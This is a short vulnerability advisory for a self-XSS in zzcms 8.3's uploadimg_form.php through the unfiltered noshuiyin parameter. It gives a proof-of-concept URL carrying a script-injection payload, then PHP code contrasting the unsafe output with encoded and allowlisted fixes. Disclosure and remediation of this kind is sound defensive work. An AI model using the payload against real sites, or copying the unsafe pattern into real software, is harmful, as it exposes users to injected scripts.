
Component

zzcms 8.3. Download link: http://www.zzcms.net/about/6.htm

Vulnerability location

In /uploadimg_form.php, line 66, the noshuiyin parameter is taken directly from user input with no security filtering, which causes a self-XSS.

Vulnerability trigger condition

Triggered after a user or admin logs in.

POC

http://192.168.30.216/uploadimg_form.php?noshuiyin="><script>alert(1)</script>"
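
Mitigation sketch for the reflection described under "Vulnerability location". This is an added example, not zzcms source code: it assumes the value is written into a double-quoted HTML attribute (which the leading `">` in the PoC suggests) and that noshuiyin is an on/off flag. The function names and the markup are hypothetical.

```php
<?php
// Added illustration, not code from zzcms. Markup and helper names are hypothetical.

// Pattern the report describes: the request value reaches the page unfiltered.
function render_unsafe(array $query): string
{
    $v = $query['noshuiyin'] ?? '';
    return '<input type="hidden" name="noshuiyin" value="' . $v . '">';
}

// Fix 1: encode for the output context (a quoted HTML attribute).
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function render_encoded(array $query): string
{
    $v = $query['noshuiyin'] ?? '';
    if (!is_string($v)) {
        $v = ''; // noshuiyin[]=x arrives as an array; treat it as empty
    }
    $safe = htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="noshuiyin" value="' . $safe . '">';
}

// Fix 2 (assumption: the parameter is a simple flag): allowlist the value,
// so nothing the client sends is ever copied into the response.
function render_allowlisted(array $query): string
{
    $flag = (($query['noshuiyin'] ?? '') === '1') ? '1' : '0';
    return '<input type="hidden" name="noshuiyin" value="' . $flag . '">';
}

// Constructed input: the same value the PoC URL above carries.
$query = ['noshuiyin' => '"><script>alert(1)</script>"'];

echo "unsafe:      ", render_unsafe($query), "\n";      // attribute is closed early
echo "encoded:     ", render_encoded($query), "\n";     // value stays inside the attribute
echo "allowlisted: ", render_allowlisted($query), "\n"; // value replaced by a known flag
```

Encoding must match the output context: if the parameter is instead echoed inside a `<script>` block or a URL, `htmlspecialchars` alone is not the right encoder, and the allowlist variant is the safer choice.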
